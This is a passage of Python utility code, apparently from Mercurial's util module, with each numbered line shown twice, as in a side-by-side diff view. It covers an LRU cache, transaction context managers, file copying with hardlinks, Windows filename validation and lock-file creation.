1164 class transactional(object):
1165 """Base class for making a transactional type into a context manager."""
1165 """Base class for making a transactional type into a context manager."""
1166 __metaclass__ = abc.ABCMeta
1166 __metaclass__ = abc.ABCMeta
1167
1167
1168 @abc.abstractmethod
1168 @abc.abstractmethod
1169 def close(self):
1169 def close(self):
1170 """Successfully closes the transaction."""
1170 """Successfully closes the transaction."""
1171
1171
1172 @abc.abstractmethod
1172 @abc.abstractmethod
1173 def release(self):
1173 def release(self):
1174 """Marks the end of the transaction.
1174 """Marks the end of the transaction.
1175
1175
1176 If the transaction has not been closed, it will be aborted.
1176 If the transaction has not been closed, it will be aborted.
1177 """
1177 """
1178
1178
1179 def __enter__(self):
1179 def __enter__(self):
1180 return self
1180 return self
1181
1181
1182 def __exit__(self, exc_type, exc_val, exc_tb):
1182 def __exit__(self, exc_type, exc_val, exc_tb):
1183 try:
1183 try:
1184 if exc_type is None:
1184 if exc_type is None:
1185 self.close()
1185 self.close()
1186 finally:
1186 finally:
1187 self.release()
1187 self.release()
1188
1188
1189 @contextlib.contextmanager
1189 @contextlib.contextmanager
1190 def acceptintervention(tr=None):
1190 def acceptintervention(tr=None):
1191 """A context manager that closes the transaction on InterventionRequired
1191 """A context manager that closes the transaction on InterventionRequired
1192
1192
1193 If no transaction was provided, this simply runs the body and returns
1193 If no transaction was provided, this simply runs the body and returns
1194 """
1194 """
1195 if not tr:
1195 if not tr:
1196 yield
1196 yield
1197 return
1197 return
1198 try:
1198 try:
1199 yield
1199 yield
1200 tr.close()
1200 tr.close()
1201 except error.InterventionRequired:
1201 except error.InterventionRequired:
1202 tr.close()
1202 tr.close()
1203 raise
1203 raise
1204 finally:
1204 finally:
1205 tr.release()
1205 tr.release()
1206
1206
1207 @contextlib.contextmanager
1207 @contextlib.contextmanager
1208 def nullcontextmanager():
1208 def nullcontextmanager():
1209 yield
1209 yield
1210
1210
1211 class _lrucachenode(object):
1211 class _lrucachenode(object):
1212 """A node in a doubly linked list.
1212 """A node in a doubly linked list.
1213
1213
1214 Holds a reference to nodes on either side as well as a key-value
1214 Holds a reference to nodes on either side as well as a key-value
1215 pair for the dictionary entry.
1215 pair for the dictionary entry.
1216 """
1216 """
1217 __slots__ = (u'next', u'prev', u'key', u'value')
1217 __slots__ = (u'next', u'prev', u'key', u'value')
1218
1218
1219 def __init__(self):
1219 def __init__(self):
1220 self.next = None
1220 self.next = None
1221 self.prev = None
1221 self.prev = None
1222
1222
1223 self.key = _notset
1223 self.key = _notset
1224 self.value = None
1224 self.value = None
1225
1225
1226 def markempty(self):
1226 def markempty(self):
1227 """Mark the node as emptied."""
1227 """Mark the node as emptied."""
1228 self.key = _notset
1228 self.key = _notset
1229
1229
1230 class lrucachedict(object):
1230 class lrucachedict(object):
1231 """Dict that caches most recent accesses and sets.
1231 """Dict that caches most recent accesses and sets.
1232
1232
1233 The dict consists of an actual backing dict - indexed by original
1233 The dict consists of an actual backing dict - indexed by original
1234 key - and a doubly linked circular list defining the order of entries in
1234 key - and a doubly linked circular list defining the order of entries in
1235 the cache.
1235 the cache.
1236
1236
1237 The head node is the newest entry in the cache. If the cache is full,
1237 The head node is the newest entry in the cache. If the cache is full,
1238 we recycle head.prev and make it the new head. Cache accesses result in
1238 we recycle head.prev and make it the new head. Cache accesses result in
1239 the node being moved to before the existing head and being marked as the
1239 the node being moved to before the existing head and being marked as the
1240 new head node.
1240 new head node.
1241 """
1241 """
1242 def __init__(self, max):
1242 def __init__(self, max):
1243 self._cache = {}
1243 self._cache = {}
1244
1244
1245 self._head = head = _lrucachenode()
1245 self._head = head = _lrucachenode()
1246 head.prev = head
1246 head.prev = head
1247 head.next = head
1247 head.next = head
1248 self._size = 1
1248 self._size = 1
1249 self._capacity = max
1249 self._capacity = max
1250
1250
1251 def __len__(self):
1251 def __len__(self):
1252 return len(self._cache)
1252 return len(self._cache)
1253
1253
1254 def __contains__(self, k):
1254 def __contains__(self, k):
1255 return k in self._cache
1255 return k in self._cache
1256
1256
1257 def __iter__(self):
1257 def __iter__(self):
1258 # We don't have to iterate in cache order, but why not.
1258 # We don't have to iterate in cache order, but why not.
1259 n = self._head
1259 n = self._head
1260 for i in range(len(self._cache)):
1260 for i in range(len(self._cache)):
1261 yield n.key
1261 yield n.key
1262 n = n.next
1262 n = n.next
1263
1263
1264 def __getitem__(self, k):
1264 def __getitem__(self, k):
1265 node = self._cache[k]
1265 node = self._cache[k]
1266 self._movetohead(node)
1266 self._movetohead(node)
1267 return node.value
1267 return node.value
1268
1268
1269 def __setitem__(self, k, v):
1269 def __setitem__(self, k, v):
1270 node = self._cache.get(k)
1270 node = self._cache.get(k)
1271 # Replace existing value and mark as newest.
1271 # Replace existing value and mark as newest.
1272 if node is not None:
1272 if node is not None:
1273 node.value = v
1273 node.value = v
1274 self._movetohead(node)
1274 self._movetohead(node)
1275 return
1275 return
1276
1276
1277 if self._size < self._capacity:
1277 if self._size < self._capacity:
1278 node = self._addcapacity()
1278 node = self._addcapacity()
1279 else:
1279 else:
1280 # Grab the last/oldest item.
1280 # Grab the last/oldest item.
1281 node = self._head.prev
1281 node = self._head.prev
1282
1282
1283 # At capacity. Kill the old entry.
1283 # At capacity. Kill the old entry.
1284 if node.key is not _notset:
1284 if node.key is not _notset:
1285 del self._cache[node.key]
1285 del self._cache[node.key]
1286
1286
1287 node.key = k
1287 node.key = k
1288 node.value = v
1288 node.value = v
1289 self._cache[k] = node
1289 self._cache[k] = node
1290 # And mark it as newest entry. No need to adjust order since it
1290 # And mark it as newest entry. No need to adjust order since it
1291 # is already self._head.prev.
1291 # is already self._head.prev.
1292 self._head = node
1292 self._head = node
1293
1293
1294 def __delitem__(self, k):
1294 def __delitem__(self, k):
1295 node = self._cache.pop(k)
1295 node = self._cache.pop(k)
1296 node.markempty()
1296 node.markempty()
1297
1297
1298 # Temporarily mark as newest item before re-adjusting head to make
1298 # Temporarily mark as newest item before re-adjusting head to make
1299 # this node the oldest item.
1299 # this node the oldest item.
1300 self._movetohead(node)
1300 self._movetohead(node)
1301 self._head = node.next
1301 self._head = node.next
1302
1302
1303 # Additional dict methods.
1303 # Additional dict methods.
1304
1304
1305 def get(self, k, default=None):
1305 def get(self, k, default=None):
1306 try:
1306 try:
1307 return self._cache[k].value
1307 return self._cache[k].value
1308 except KeyError:
1308 except KeyError:
1309 return default
1309 return default
1310
1310
1311 def clear(self):
1311 def clear(self):
1312 n = self._head
1312 n = self._head
1313 while n.key is not _notset:
1313 while n.key is not _notset:
1314 n.markempty()
1314 n.markempty()
1315 n = n.next
1315 n = n.next
1316
1316
1317 self._cache.clear()
1317 self._cache.clear()
1318
1318
1319 def copy(self):
1319 def copy(self):
1320 result = lrucachedict(self._capacity)
1320 result = lrucachedict(self._capacity)
1321 n = self._head.prev
1321 n = self._head.prev
1322 # Iterate in oldest-to-newest order, so the copy has the right ordering
1322 # Iterate in oldest-to-newest order, so the copy has the right ordering
1323 for i in range(len(self._cache)):
1323 for i in range(len(self._cache)):
1324 result[n.key] = n.value
1324 result[n.key] = n.value
1325 n = n.prev
1325 n = n.prev
1326 return result
1326 return result
1327
1327
1328 def _movetohead(self, node):
1328 def _movetohead(self, node):
1329 """Mark a node as the newest, making it the new head.
1329 """Mark a node as the newest, making it the new head.
1330
1330
1331 When a node is accessed, it becomes the freshest entry in the LRU
1331 When a node is accessed, it becomes the freshest entry in the LRU
1332 list, which is denoted by self._head.
1332 list, which is denoted by self._head.
1333
1333
1334 Visually, let's make ``N`` the new head node (* denotes head):
1334 Visually, let's make ``N`` the new head node (* denotes head):
1335
1335
1336 previous/oldest <-> head <-> next/next newest
1336 previous/oldest <-> head <-> next/next newest
1337
1337
1338 ----<->--- A* ---<->-----
1338 ----<->--- A* ---<->-----
1339 | |
1339 | |
1340 E <-> D <-> N <-> C <-> B
1340 E <-> D <-> N <-> C <-> B
1341
1341
1342 To:
1342 To:
1343
1343
1344 ----<->--- N* ---<->-----
1344 ----<->--- N* ---<->-----
1345 | |
1345 | |
1346 E <-> D <-> C <-> B <-> A
1346 E <-> D <-> C <-> B <-> A
1347
1347
1348 This requires the following moves:
1348 This requires the following moves:
1349
1349
1350 C.next = D (node.prev.next = node.next)
1350 C.next = D (node.prev.next = node.next)
1351 D.prev = C (node.next.prev = node.prev)
1351 D.prev = C (node.next.prev = node.prev)
1352 E.next = N (head.prev.next = node)
1352 E.next = N (head.prev.next = node)
1353 N.prev = E (node.prev = head.prev)
1353 N.prev = E (node.prev = head.prev)
1354 N.next = A (node.next = head)
1354 N.next = A (node.next = head)
1355 A.prev = N (head.prev = node)
1355 A.prev = N (head.prev = node)
1356 """
1356 """
1357 head = self._head
1357 head = self._head
1358 # C.next = D
1358 # C.next = D
1359 node.prev.next = node.next
1359 node.prev.next = node.next
1360 # D.prev = C
1360 # D.prev = C
1361 node.next.prev = node.prev
1361 node.next.prev = node.prev
1362 # N.prev = E
1362 # N.prev = E
1363 node.prev = head.prev
1363 node.prev = head.prev
1364 # N.next = A
1364 # N.next = A
1365 # It is tempting to do just "head" here, however if node is
1365 # It is tempting to do just "head" here, however if node is
1366 # adjacent to head, this will do bad things.
1366 # adjacent to head, this will do bad things.
1367 node.next = head.prev.next
1367 node.next = head.prev.next
1368 # E.next = N
1368 # E.next = N
1369 node.next.prev = node
1369 node.next.prev = node
1370 # A.prev = N
1370 # A.prev = N
1371 node.prev.next = node
1371 node.prev.next = node
1372
1372
1373 self._head = node
1373 self._head = node
1374
1374
1375 def _addcapacity(self):
1375 def _addcapacity(self):
1376 """Add a node to the circular linked list.
1376 """Add a node to the circular linked list.
1377
1377
1378 The new node is inserted before the head node.
1378 The new node is inserted before the head node.
1379 """
1379 """
1380 head = self._head
1380 head = self._head
1381 node = _lrucachenode()
1381 node = _lrucachenode()
1382 head.prev.next = node
1382 head.prev.next = node
1383 node.prev = head.prev
1383 node.prev = head.prev
1384 node.next = head
1384 node.next = head
1385 head.prev = node
1385 head.prev = node
1386 self._size += 1
1386 self._size += 1
1387 return node
1387 return node
1388
1388
1389 def lrucachefunc(func):
1389 def lrucachefunc(func):
1390 '''cache most recent results of function calls'''
1390 '''cache most recent results of function calls'''
1391 cache = {}
1391 cache = {}
1392 order = collections.deque()
1392 order = collections.deque()
1393 if func.__code__.co_argcount == 1:
1393 if func.__code__.co_argcount == 1:
1394 def f(arg):
1394 def f(arg):
1395 if arg not in cache:
1395 if arg not in cache:
1396 if len(cache) > 20:
1396 if len(cache) > 20:
1397 del cache[order.popleft()]
1397 del cache[order.popleft()]
1398 cache[arg] = func(arg)
1398 cache[arg] = func(arg)
1399 else:
1399 else:
1400 order.remove(arg)
1400 order.remove(arg)
1401 order.append(arg)
1401 order.append(arg)
1402 return cache[arg]
1402 return cache[arg]
1403 else:
1403 else:
1404 def f(*args):
1404 def f(*args):
1405 if args not in cache:
1405 if args not in cache:
1406 if len(cache) > 20:
1406 if len(cache) > 20:
1407 del cache[order.popleft()]
1407 del cache[order.popleft()]
1408 cache[args] = func(*args)
1408 cache[args] = func(*args)
1409 else:
1409 else:
1410 order.remove(args)
1410 order.remove(args)
1411 order.append(args)
1411 order.append(args)
1412 return cache[args]
1412 return cache[args]
1413
1413
1414 return f
1414 return f
1415
1415
1416 class propertycache(object):
1416 class propertycache(object):
1417 def __init__(self, func):
1417 def __init__(self, func):
1418 self.func = func
1418 self.func = func
1419 self.name = func.__name__
1419 self.name = func.__name__
1420 def __get__(self, obj, type=None):
1420 def __get__(self, obj, type=None):
1421 result = self.func(obj)
1421 result = self.func(obj)
1422 self.cachevalue(obj, result)
1422 self.cachevalue(obj, result)
1423 return result
1423 return result
1424
1424
1425 def cachevalue(self, obj, value):
1425 def cachevalue(self, obj, value):
1426 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1426 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1427 obj.__dict__[self.name] = value
1427 obj.__dict__[self.name] = value
1428
1428
1429 def clearcachedproperty(obj, prop):
1429 def clearcachedproperty(obj, prop):
1430 '''clear a cached property value, if one has been set'''
1430 '''clear a cached property value, if one has been set'''
1431 if prop in obj.__dict__:
1431 if prop in obj.__dict__:
1432 del obj.__dict__[prop]
1432 del obj.__dict__[prop]
1433
1433
1434 def increasingchunks(source, min=1024, max=65536):
1434 def increasingchunks(source, min=1024, max=65536):
1435 '''return no less than min bytes per chunk while data remains,
1435 '''return no less than min bytes per chunk while data remains,
1436 doubling min after each chunk until it reaches max'''
1436 doubling min after each chunk until it reaches max'''
1437 def log2(x):
1437 def log2(x):
1438 if not x:
1438 if not x:
1439 return 0
1439 return 0
1440 i = 0
1440 i = 0
1441 while x:
1441 while x:
1442 x >>= 1
1442 x >>= 1
1443 i += 1
1443 i += 1
1444 return i - 1
1444 return i - 1
1445
1445
1446 buf = []
1446 buf = []
1447 blen = 0
1447 blen = 0
1448 for chunk in source:
1448 for chunk in source:
1449 buf.append(chunk)
1449 buf.append(chunk)
1450 blen += len(chunk)
1450 blen += len(chunk)
1451 if blen >= min:
1451 if blen >= min:
1452 if min < max:
1452 if min < max:
1453 min = min << 1
1453 min = min << 1
1454 nmin = 1 << log2(blen)
1454 nmin = 1 << log2(blen)
1455 if nmin > min:
1455 if nmin > min:
1456 min = nmin
1456 min = nmin
1457 if min > max:
1457 if min > max:
1458 min = max
1458 min = max
1459 yield ''.join(buf)
1459 yield ''.join(buf)
1460 blen = 0
1460 blen = 0
1461 buf = []
1461 buf = []
1462 if buf:
1462 if buf:
1463 yield ''.join(buf)
1463 yield ''.join(buf)
1464
1464
1465 def always(fn):
1465 def always(fn):
1466 return True
1466 return True
1467
1467
1468 def never(fn):
1468 def never(fn):
1469 return False
1469 return False
1470
1470
1471 def nogc(func):
1471 def nogc(func):
1472 """disable garbage collector
1472 """disable garbage collector
1473
1473
1474 Python's garbage collector triggers a GC each time a certain number of
1474 Python's garbage collector triggers a GC each time a certain number of
1475 container objects (the number being defined by gc.get_threshold()) are
1475 container objects (the number being defined by gc.get_threshold()) are
1476 allocated even when marked not to be tracked by the collector. Tracking has
1476 allocated even when marked not to be tracked by the collector. Tracking has
1477 no effect on when GCs are triggered, only on what objects the GC looks
1477 no effect on when GCs are triggered, only on what objects the GC looks
1478 into. As a workaround, disable GC while building complex (huge)
1478 into. As a workaround, disable GC while building complex (huge)
1479 containers.
1479 containers.
1480
1480
1481 This garbage collector issue have been fixed in 2.7. But it still affect
1481 This garbage collector issue have been fixed in 2.7. But it still affect
1482 CPython's performance.
1482 CPython's performance.
1483 """
1483 """
1484 def wrapper(*args, **kwargs):
1484 def wrapper(*args, **kwargs):
1485 gcenabled = gc.isenabled()
1485 gcenabled = gc.isenabled()
1486 gc.disable()
1486 gc.disable()
1487 try:
1487 try:
1488 return func(*args, **kwargs)
1488 return func(*args, **kwargs)
1489 finally:
1489 finally:
1490 if gcenabled:
1490 if gcenabled:
1491 gc.enable()
1491 gc.enable()
1492 return wrapper
1492 return wrapper
1493
1493
1494 if pycompat.ispypy:
1494 if pycompat.ispypy:
1495 # PyPy runs slower with gc disabled
1495 # PyPy runs slower with gc disabled
1496 nogc = lambda x: x
1496 nogc = lambda x: x
1497
1497
1498 def pathto(root, n1, n2):
1498 def pathto(root, n1, n2):
1499 '''return the relative path from one place to another.
1499 '''return the relative path from one place to another.
1500 root should use os.sep to separate directories
1500 root should use os.sep to separate directories
1501 n1 should use os.sep to separate directories
1501 n1 should use os.sep to separate directories
1502 n2 should use "/" to separate directories
1502 n2 should use "/" to separate directories
1503 returns an os.sep-separated path.
1503 returns an os.sep-separated path.
1504
1504
1505 If n1 is a relative path, it's assumed it's
1505 If n1 is a relative path, it's assumed it's
1506 relative to root.
1506 relative to root.
1507 n2 should always be relative to root.
1507 n2 should always be relative to root.
1508 '''
1508 '''
1509 if not n1:
1509 if not n1:
1510 return localpath(n2)
1510 return localpath(n2)
1511 if os.path.isabs(n1):
1511 if os.path.isabs(n1):
1512 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1512 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1513 return os.path.join(root, localpath(n2))
1513 return os.path.join(root, localpath(n2))
1514 n2 = '/'.join((pconvert(root), n2))
1514 n2 = '/'.join((pconvert(root), n2))
1515 a, b = splitpath(n1), n2.split('/')
1515 a, b = splitpath(n1), n2.split('/')
1516 a.reverse()
1516 a.reverse()
1517 b.reverse()
1517 b.reverse()
1518 while a and b and a[-1] == b[-1]:
1518 while a and b and a[-1] == b[-1]:
1519 a.pop()
1519 a.pop()
1520 b.pop()
1520 b.pop()
1521 b.reverse()
1521 b.reverse()
1522 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1522 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1523
1523
1524 # the location of data files matching the source code
1524 # the location of data files matching the source code
1525 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1525 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1526 # executable version (py2exe) doesn't support __file__
1526 # executable version (py2exe) doesn't support __file__
1527 datapath = os.path.dirname(pycompat.sysexecutable)
1527 datapath = os.path.dirname(pycompat.sysexecutable)
1528 else:
1528 else:
1529 datapath = os.path.dirname(pycompat.fsencode(__file__))
1529 datapath = os.path.dirname(pycompat.fsencode(__file__))
1530
1530
1531 i18n.setdatapath(datapath)
1531 i18n.setdatapath(datapath)
1532
1532
1533 def checksignature(func):
1533 def checksignature(func):
1534 '''wrap a function with code to check for calling errors'''
1534 '''wrap a function with code to check for calling errors'''
1535 def check(*args, **kwargs):
1535 def check(*args, **kwargs):
1536 try:
1536 try:
1537 return func(*args, **kwargs)
1537 return func(*args, **kwargs)
1538 except TypeError:
1538 except TypeError:
1539 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1539 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1540 raise error.SignatureError
1540 raise error.SignatureError
1541 raise
1541 raise
1542
1542
1543 return check
1543 return check
1544
1544
1545 # a whilelist of known filesystems where hardlink works reliably
1545 # a whilelist of known filesystems where hardlink works reliably
1546 _hardlinkfswhitelist = {
1546 _hardlinkfswhitelist = {
1547 'btrfs',
1547 'btrfs',
1548 'ext2',
1548 'ext2',
1549 'ext3',
1549 'ext3',
1550 'ext4',
1550 'ext4',
1551 'hfs',
1551 'hfs',
1552 'jfs',
1552 'jfs',
1553 'NTFS',
1553 'NTFS',
1554 'reiserfs',
1554 'reiserfs',
1555 'tmpfs',
1555 'tmpfs',
1556 'ufs',
1556 'ufs',
1557 'xfs',
1557 'xfs',
1558 'zfs',
1558 'zfs',
1559 }
1559 }
1560
1560
1561 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1561 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1562 '''copy a file, preserving mode and optionally other stat info like
1562 '''copy a file, preserving mode and optionally other stat info like
1563 atime/mtime
1563 atime/mtime
1564
1564
1565 checkambig argument is used with filestat, and is useful only if
1565 checkambig argument is used with filestat, and is useful only if
1566 destination file is guarded by any lock (e.g. repo.lock or
1566 destination file is guarded by any lock (e.g. repo.lock or
1567 repo.wlock).
1567 repo.wlock).
1568
1568
1569 copystat and checkambig should be exclusive.
1569 copystat and checkambig should be exclusive.
1570 '''
1570 '''
1571 assert not (copystat and checkambig)
1571 assert not (copystat and checkambig)
1572 oldstat = None
1572 oldstat = None
1573 if os.path.lexists(dest):
1573 if os.path.lexists(dest):
1574 if checkambig:
1574 if checkambig:
1575 oldstat = checkambig and filestat.frompath(dest)
1575 oldstat = checkambig and filestat.frompath(dest)
1576 unlink(dest)
1576 unlink(dest)
1577 if hardlink:
1577 if hardlink:
1578 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1578 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1579 # unless we are confident that dest is on a whitelisted filesystem.
1579 # unless we are confident that dest is on a whitelisted filesystem.
1580 try:
1580 try:
1581 fstype = getfstype(os.path.dirname(dest))
1581 fstype = getfstype(os.path.dirname(dest))
1582 except OSError:
1582 except OSError:
1583 fstype = None
1583 fstype = None
1584 if fstype not in _hardlinkfswhitelist:
1584 if fstype not in _hardlinkfswhitelist:
1585 hardlink = False
1585 hardlink = False
1586 if hardlink:
1586 if hardlink:
1587 try:
1587 try:
1588 oslink(src, dest)
1588 oslink(src, dest)
1589 return
1589 return
1590 except (IOError, OSError):
1590 except (IOError, OSError):
1591 pass # fall back to normal copy
1591 pass # fall back to normal copy
1592 if os.path.islink(src):
1592 if os.path.islink(src):
1593 os.symlink(os.readlink(src), dest)
1593 os.symlink(os.readlink(src), dest)
1594 # copytime is ignored for symlinks, but in general copytime isn't needed
1594 # copytime is ignored for symlinks, but in general copytime isn't needed
1595 # for them anyway
1595 # for them anyway
1596 else:
1596 else:
1597 try:
1597 try:
1598 shutil.copyfile(src, dest)
1598 shutil.copyfile(src, dest)
1599 if copystat:
1599 if copystat:
1600 # copystat also copies mode
1600 # copystat also copies mode
1601 shutil.copystat(src, dest)
1601 shutil.copystat(src, dest)
1602 else:
1602 else:
1603 shutil.copymode(src, dest)
1603 shutil.copymode(src, dest)
1604 if oldstat and oldstat.stat:
1604 if oldstat and oldstat.stat:
1605 newstat = filestat.frompath(dest)
1605 newstat = filestat.frompath(dest)
1606 if newstat.isambig(oldstat):
1606 if newstat.isambig(oldstat):
1607 # stat of copied file is ambiguous to original one
1607 # stat of copied file is ambiguous to original one
1608 advanced = (
1608 advanced = (
1609 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1609 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1610 os.utime(dest, (advanced, advanced))
1610 os.utime(dest, (advanced, advanced))
1611 except shutil.Error as inst:
1611 except shutil.Error as inst:
1612 raise error.Abort(str(inst))
1612 raise error.Abort(str(inst))
1613
1613
1614 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1614 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1615 """Copy a directory tree using hardlinks if possible."""
1615 """Copy a directory tree using hardlinks if possible."""
1616 num = 0
1616 num = 0
1617
1617
1618 gettopic = lambda: hardlink and _('linking') or _('copying')
1618 gettopic = lambda: hardlink and _('linking') or _('copying')
1619
1619
1620 if os.path.isdir(src):
1620 if os.path.isdir(src):
1621 if hardlink is None:
1621 if hardlink is None:
1622 hardlink = (os.stat(src).st_dev ==
1622 hardlink = (os.stat(src).st_dev ==
1623 os.stat(os.path.dirname(dst)).st_dev)
1623 os.stat(os.path.dirname(dst)).st_dev)
1624 topic = gettopic()
1624 topic = gettopic()
1625 os.mkdir(dst)
1625 os.mkdir(dst)
1626 for name, kind in listdir(src):
1626 for name, kind in listdir(src):
1627 srcname = os.path.join(src, name)
1627 srcname = os.path.join(src, name)
1628 dstname = os.path.join(dst, name)
1628 dstname = os.path.join(dst, name)
1629 def nprog(t, pos):
1629 def nprog(t, pos):
1630 if pos is not None:
1630 if pos is not None:
1631 return progress(t, pos + num)
1631 return progress(t, pos + num)
1632 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1632 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1633 num += n
1633 num += n
1634 else:
1634 else:
1635 if hardlink is None:
1635 if hardlink is None:
1636 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1636 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1637 os.stat(os.path.dirname(dst)).st_dev)
1637 os.stat(os.path.dirname(dst)).st_dev)
1638 topic = gettopic()
1638 topic = gettopic()
1639
1639
1640 if hardlink:
1640 if hardlink:
1641 try:
1641 try:
1642 oslink(src, dst)
1642 oslink(src, dst)
1643 except (IOError, OSError):
1643 except (IOError, OSError):
1644 hardlink = False
1644 hardlink = False
1645 shutil.copy(src, dst)
1645 shutil.copy(src, dst)
1646 else:
1646 else:
1647 shutil.copy(src, dst)
1647 shutil.copy(src, dst)
1648 num += 1
1648 num += 1
1649 progress(topic, num)
1649 progress(topic, num)
1650 progress(topic, None)
1650 progress(topic, None)
1651
1651
1652 return hardlink, num
1652 return hardlink, num
1653
1653
1654 _winreservednames = {
1654 _winreservednames = {
1655 'con', 'prn', 'aux', 'nul',
1655 'con', 'prn', 'aux', 'nul',
1656 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1656 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1657 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1657 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1658 }
1658 }
1659 _winreservedchars = ':*?"<>|'
1659 _winreservedchars = ':*?"<>|'
1660 def checkwinfilename(path):
1660 def checkwinfilename(path):
1661 r'''Check that the base-relative path is a valid filename on Windows.
1661 r'''Check that the base-relative path is a valid filename on Windows.
1662 Returns None if the path is ok, or a UI string describing the problem.
1662 Returns None if the path is ok, or a UI string describing the problem.
1663
1663
1664 >>> checkwinfilename(b"just/a/normal/path")
1664 >>> checkwinfilename(b"just/a/normal/path")
1665 >>> checkwinfilename(b"foo/bar/con.xml")
1665 >>> checkwinfilename(b"foo/bar/con.xml")
1666 "filename contains 'con', which is reserved on Windows"
1666 "filename contains 'con', which is reserved on Windows"
1667 >>> checkwinfilename(b"foo/con.xml/bar")
1667 >>> checkwinfilename(b"foo/con.xml/bar")
1668 "filename contains 'con', which is reserved on Windows"
1668 "filename contains 'con', which is reserved on Windows"
1669 >>> checkwinfilename(b"foo/bar/xml.con")
1669 >>> checkwinfilename(b"foo/bar/xml.con")
1670 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1670 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1671 "filename contains 'AUX', which is reserved on Windows"
1671 "filename contains 'AUX', which is reserved on Windows"
1672 >>> checkwinfilename(b"foo/bar/bla:.txt")
1672 >>> checkwinfilename(b"foo/bar/bla:.txt")
1673 "filename contains ':', which is reserved on Windows"
1673 "filename contains ':', which is reserved on Windows"
1674 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1674 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1675 "filename contains '\\x07', which is invalid on Windows"
1675 "filename contains '\\x07', which is invalid on Windows"
1676 >>> checkwinfilename(b"foo/bar/bla ")
1676 >>> checkwinfilename(b"foo/bar/bla ")
1677 "filename ends with ' ', which is not allowed on Windows"
1677 "filename ends with ' ', which is not allowed on Windows"
1678 >>> checkwinfilename(b"../bar")
1678 >>> checkwinfilename(b"../bar")
1679 >>> checkwinfilename(b"foo\\")
1679 >>> checkwinfilename(b"foo\\")
1680 "filename ends with '\\', which is invalid on Windows"
1680 "filename ends with '\\', which is invalid on Windows"
1681 >>> checkwinfilename(b"foo\\/bar")
1681 >>> checkwinfilename(b"foo\\/bar")
1682 "directory name ends with '\\', which is invalid on Windows"
1682 "directory name ends with '\\', which is invalid on Windows"
1683 '''
1683 '''
1684 if path.endswith('\\'):
1684 if path.endswith('\\'):
1685 return _("filename ends with '\\', which is invalid on Windows")
1685 return _("filename ends with '\\', which is invalid on Windows")
1686 if '\\/' in path:
1686 if '\\/' in path:
1687 return _("directory name ends with '\\', which is invalid on Windows")
1687 return _("directory name ends with '\\', which is invalid on Windows")
1688 for n in path.replace('\\', '/').split('/'):
1688 for n in path.replace('\\', '/').split('/'):
1689 if not n:
1689 if not n:
1690 continue
1690 continue
1691 for c in _filenamebytestr(n):
1691 for c in _filenamebytestr(n):
1692 if c in _winreservedchars:
1692 if c in _winreservedchars:
1693 return _("filename contains '%s', which is reserved "
1693 return _("filename contains '%s', which is reserved "
1694 "on Windows") % c
1694 "on Windows") % c
1695 if ord(c) <= 31:
1695 if ord(c) <= 31:
1696 return _("filename contains '%s', which is invalid "
1696 return _("filename contains '%s', which is invalid "
1697 "on Windows") % stringutil.escapestr(c)
1697 "on Windows") % stringutil.escapestr(c)
1698 base = n.split('.')[0]
1698 base = n.split('.')[0]
1699 if base and base.lower() in _winreservednames:
1699 if base and base.lower() in _winreservednames:
1700 return _("filename contains '%s', which is reserved "
1700 return _("filename contains '%s', which is reserved "
1701 "on Windows") % base
1701 "on Windows") % base
1702 t = n[-1:]
1702 t = n[-1:]
1703 if t in '. ' and n not in '..':
1703 if t in '. ' and n not in '..':
1704 return _("filename ends with '%s', which is not allowed "
1704 return _("filename ends with '%s', which is not allowed "
1705 "on Windows") % t
1705 "on Windows") % t
1706
1706
1707 if pycompat.iswindows:
1707 if pycompat.iswindows:
1708 checkosfilename = checkwinfilename
1708 checkosfilename = checkwinfilename
1709 timer = time.clock
1709 timer = time.clock
1710 else:
1710 else:
1711 checkosfilename = platform.checkosfilename
1711 checkosfilename = platform.checkosfilename
1712 timer = time.time
1712 timer = time.time
1713
1713
1714 if safehasattr(time, "perf_counter"):
1714 if safehasattr(time, "perf_counter"):
1715 timer = time.perf_counter
1715 timer = time.perf_counter
1716
1716
1717 def makelock(info, pathname):
1717 def makelock(info, pathname):
1718 """Create a lock file atomically if possible
1718 """Create a lock file atomically if possible
1719
1719
1720 This may leave a stale lock file if symlink isn't supported and signal
1720 This may leave a stale lock file if symlink isn't supported and signal
1721 interrupt is enabled.
1721 interrupt is enabled.
1722 """
1722 """
1723 try:
1723 try:
1724 return os.symlink(info, pathname)
1724 return os.symlink(info, pathname)
1725 except OSError as why:
1725 except OSError as why:
1726 if why.errno == errno.EEXIST:
1726 if why.errno == errno.EEXIST:
1727 raise
1727 raise
1728 except AttributeError: # no symlink in os
1728 except AttributeError: # no symlink in os
1729 pass
1729 pass
1730
1730
